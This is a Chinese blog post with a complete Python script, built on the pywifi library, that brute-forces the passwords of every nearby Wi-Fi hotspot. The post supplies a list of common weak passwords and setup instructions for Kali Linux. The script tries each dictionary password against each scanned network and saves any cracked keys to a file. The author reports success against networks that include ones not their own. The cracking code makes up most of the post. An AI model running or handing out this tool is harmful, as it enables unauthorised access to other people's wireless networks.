一个非常简单易懂的WIFI密码爆破python脚本
2019-01-26 14:41
1111 查看
版权声明:派森学python,欢迎加群:923414804与博主一起学习 https://blog.csdn.net/weixin_44369414/article/details/86657125
环境准备
- python2.7
- 凑合的linux
- 差不多的无线网卡
- pywifi模块
- 弱口令字典
- 清除系统中的任何wifi连接记录(非常重要!!!)
首先,这个模块在win下有点鸡肋,作者在调用WLANAPI时没有做好WLAN_SECURITY_ATTRIBUTES的封装,所以推荐在linux下跑,我测试所使用的是Kali 2.0 自带python 2.7.6 ,可直接通过 pip install pywifi 安装。
导入模块
这里用的模块就这三个 pywifi的_wifiutil_linux.py脚本的 _send_cmd_to_wpas方法中的if reply != b’OK\n’:判断需要修改,不然会有很多的提示信息。
from pywifi import * import time import sys
字典准备
效率很重要,毕竟这东西跑起来可真慢,下面是天朝用的比较多的wifi弱口令TOP10
- 12345678
- 123456789
- 88888888
- 1234567890
- 00000000
- 87654321
- 66668888
- 11223344
- 147258369
- 11111111
配置扫描器
推荐扫描时常可以设置在15-20秒之间 测试时常则可以自定义,考虑到认证速度于距离的关系,我一般设置在15左右,再久的也没意义 到时候就算破解成功的热点,信号也好不到哪里
def main(): #扫描时常 scantimes = 3 #单个密码测试延迟 testtimes = 15 output = sys.stdout #结果文件保存路径 files = "TestRes.txt" #字典列表 keys = open(sys.argv[1],"r").readlines() print "|KEYS %s"%(len(keys)) #实例化一个pywifi对象 wifi = PyWiFi() #选择定一个网卡并赋值于iface iface = wifi.interfaces()[0] #通过iface进行一个时常为scantimes的扫描并获取附近的热点基础配置 scanres = scans(iface,scantimes) #统计附近被发现的热点数量 nums = len(scanres) print "|SCAN GET %s"%(nums) print "%s\n%-*s| %-*s| %-*s| %-*s | %-*s | %-*s %*s \n%s"%("-"*70,6,"WIFIID",18,"SSID OR BSSID",2,"N",4,"time",7,"signal",10,"KEYNUM",10,"KEY","="*70) #将每一个热点信息逐一进行测试 for i,x in enumerate(scanres): #测试完毕后,成功的结果讲存储到files中 res = test(nums-i,iface,x,keys,output,testtimes) if res: open(files,"a").write(res)
扫描周围热点
def scans(face,timeout): #开始扫描 face.scan() time.sleep(timeout) #在若干秒后获取扫描结果 return face.scan_results()
热点测试
这里后续推荐将扫描过程数据入库,防止重复扫描,且更加直观。
def test(i,face,x,key,stu,ts): #显示对应网络名称,考虑到部分中文名啧显示bssid showID = x.bssid if len(x.ssid)>len(x.bssid) else x.ssid #迭代字典并进行爆破 for n,k in enumerate(key): x.key = k.strip() #移除所有热点配置 face.remove_all_network_profiles() #讲封装好的目标尝试连接 face.connect(face.add_network_profile(x)) #初始化状态码,考虑到用0会发生些逻辑错误 code = 10 t1 = time.time() #循环刷新状态,如果置为0则密码错误,如超时则进行下一个 while code!=0 : time.sleep(0.1) code = face.status() now = time.time()-t1 if now>ts: break stu.write("\r%-*s| %-*s| %s |%*.2fs| %-*s | %-*s %*s"%(6,i,18,showID,code,5,now,7,x.signal,10,len(key)-n,10,k.replace("\n",""))) stu.flush() if code == 4: face.disconnect() return "%-*s| %s | %*s |%*s\n"%(20,x.ssid,x.bssid,3,x.signal,15,k) return False
案例
这里显示本次测试使用了11个弱口令,并扫描到了20个热点,然后开始坑爹的跑起来了
- *WIFIID* 热点的id号 每跑一个会减1
- *SSID OR BSSID* 热点的ssid名或mac地址
- *N* 对热点的连接状态,这个在
- time 当前所花去的时间
- signal 热点的信号强度,若小越好
- KEYNUM 测试密码的id 每跑一个会减1
- KEY 当前测试的密码
结果还不错,各位的安全意识不像以前那么蛋疼了,扫出一两个,其中一个还是自家的 – –
相关文章推荐
- 一个最简单的博客园文章密码暴力破解器-python3实现
- python练习3——请写一个密码安全性检查的脚本代码:check.py
- 宋宝华:一个简单的python脚本画出Linux程序/库依赖图
- python 一个简单的刷csnd访问量的脚本
- CTF writeup:python脚本爆破zip密码
- 关于一个简单的python上传到linux服务器再经过shell脚本ftp传输的问题
- 一个简单的脚本程序----Python
- 一个安邦逻辑漏洞爆破密码的py脚本
- 一个简单的将yuv图片转化为jpeg格式图片的Python脚本程序
- ps_mem:一个用于精确报告 Linux 核心内存用量的简单 Python 脚本
- Windows 下针对python脚本做一个简单的进程保护
- 宋宝华:一个简单的python脚本看透Linux程序对库的依赖
- Python绝技笔记--------Zip压缩文件密码爆破小脚本
- ps_mem:一个用于精确报告 Linux 核心内存用量的简单 Python 脚本
- 用python写的一个使用关键字定向生成密码字典的脚本
- 一个简单的判断远端服务器端口是否通的Python脚本
- 2-3 个性化消息: 将用户的姓名存到一个变量中,并向该用户显示一条消息。显示的消息应非常简单,如“Hello Eric, would you like to learn some Python to
- 一个简单的爆破 mysql 远程连接脚本(perl6)
- [python脚本]一个简单的web爬虫(1)
- 一个简单的使用代理访问百度页面内容的python脚本